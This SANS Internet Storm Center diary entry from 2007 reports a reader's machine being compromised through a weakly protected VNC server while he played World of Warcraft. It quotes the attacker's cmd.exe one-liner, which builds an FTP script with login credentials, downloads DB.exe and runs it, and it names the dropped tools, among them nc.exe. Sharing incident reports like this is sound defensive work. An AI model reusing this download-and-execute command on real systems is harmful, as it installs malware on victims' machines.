Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: InfoSec Handlers Diary Blog - WoW InfoSec Handlers Diary Blog

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!


Published: 2007-11-10
Last Updated: 2007-11-11 23:16:23 UTC
by Koon Yaw Tan (Version: 2)
0 comment(s)

Our reader Oscar shared with us that when he was playing world of warcraft, he suddenly lost control and got some "strange" lines appearing (injected command strings displayed within his WoW session). Below is a screenshot.

As he is also running a VNC server with a fairly easy guess password, this is what he got a couple of files:
* DB.exe
* hirc.exe
* nc.exe
* PI.exe
* vnckiller.exe

If you have encountered similar experience, let us know.

Lesson learnt: If you put any services expose to Internet without proper protection, you are asking for trouble, unless of course you are running a honeypot/honeynet. Thanks Oscar for sharing.


Oscar wrote back and gave us a detailed description of what happened.  Here is what he said:

So, it was the typical night, me playing WoW at 12:30 in the morning (Central time) and I had just set my hearthstone to Shattrath, which everyone knows is the best spot to set it.

So I was walking back out of the hearth spot, and my character started spinning around in circles, then my charter said "aaaaaaaaa"

then, what looked like code was also spoken by my character "%systemroot%\system32\cmd.exe and then /c echo open 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit So, This seemed curious, since I wasn't even on a windows platform, so I manually logged into the ftp server, did  a mget * and thought the SANS folks would be interested in these files.

Now, how did they get in?  My guess here is that I had just installed the latest and greatest version of my favorite companies OS, and I turned a feature called Screen sharing, and also X'd the option to allow VNC users to logon with a password.  Well, the password i picked was pretty guessable.  When I logged into previously mentioned ftp site, a program there was called vnckiller.exe So i would aseume thats how they got in.  Lesson for the Day: Even if your turning on a feature for testing purposes, don't choose a easy password, as most likely, you'll forget to turn off this feature, and be rooted.  Thank goodness I wasn't

 A question for our readers:  has anybody seen this happen to their session in WoW or any other virtual world simulation?


Edwin wrote us and said that he's see the same problem before.  He pointed to for details on the exploit.

0 comment(s)
Diary Archives